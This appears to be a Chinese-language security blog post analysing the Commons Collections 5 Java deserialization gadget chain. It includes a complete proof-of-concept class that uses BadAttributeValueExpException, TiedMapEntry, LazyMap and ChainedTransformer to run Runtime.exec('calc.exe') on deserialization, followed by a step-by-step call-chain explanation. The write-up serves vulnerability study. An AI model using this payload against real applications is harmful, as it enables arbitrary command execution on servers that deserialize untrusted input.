Commons Collections 5

2021-08-03

序言

环境要求： Commons-collections 3.1-3.2.1 , java版本无要求

分析

CC5继承的是CC1链,没用到字节码,用的是最朴实的ChainedTransformer

package CC5;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.keyvalue.TiedMapEntry;

import javax.management.BadAttributeValueExpException;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.util.HashMap;

public class test {
    public static void main(String[] args)throws Exception{
        //构造ChainedTransformer链
        Transformer[] transformers = new Transformer[] {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[] {String.class, Class[].class }, new Object[] {"getRuntime", new Class[0] }),
                new InvokerTransformer("invoke", new Class[] {Object.class, Object[].class }, new Object[] {null, new Object[0] }),
                new InvokerTransformer("exec", new Class[] {String.class }, new Object[] {"calc.exe"})
        };
        Transformer chain = new ChainedTransformer(transformers);

        //将chain放进Lazymap
        HashMap innermap = new HashMap();
        LazyMap map = (LazyMap)LazyMap.decorate(innermap,chain);
       // map.get(1);

        //toString() -> getValue() -> Lazymap.get()
        TiedMapEntry tiedmap = new TiedMapEntry(map,123);

        //反射修改BadAttributeValueExpException 属性val值
        BadAttributeValueExpException poc = new BadAttributeValueExpException(1);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(poc,tiedmap);

        //序列化
        ObjectOutputStream outputStream = new ObjectOutputStream(new FileOutputStream("./evilCC5.bin"));
        outputStream.writeObject(poc);
        outputStream.close();
        //反序列化
        ObjectInputStream inputStream = new ObjectInputStream(new FileInputStream("./evilCC5.bin"));
        inputStream.readObject();

    }
}

可以看到前部分和CC1一样，构造ChainedTransformer利用链

接下来利用到两个新对象：TiedMapEntry 和BadAttributeValueExpException

首先看一下这个TiedMapEntry

注意到它有一个getValue函数，会调用get方法，属性map可控。

经过前几条链的分析已经知道Lazymap.get()可以直接触发transform

寻找什么地方有调用getValue(),找到toString() 中简单粗暴的调用

1	toString() -> getValue() -> Lazymap.get()

再来看 BadAttributeValueException

readObject()作为入口

一眼望过去就看到 toString()的调用，并且valObj是获取的val属性值,所以之前我们通过反射设置了val的值

就和TiedMapEntry联系起来了

就像上面所说的一样，调用Lazymap的get,最后触发ChainedTransform.transform()执行命令。

调用链

BadAttributeValueExpException.readObject
->TiedMapEntry.toString
->LazyMap.get
->ChainedTransformer.transform
	->ConstantTransformer.transform
	->InvokerTransformer.transform
	->Method.invoke
	->Class.getMethod
	->InvokerTransformer.transform
	->Method.invoke
	->Runtime.getRuntime
	-> InvokerTransformer.transform
	->Method.invoke
	->Runtime.exec

结尾

CC5太轻松了，继承CC1，比CC1简单，建议先分析一遍CC1。新用到的TiedMapEntry和BadAttributeValueException都很友好，一目了然。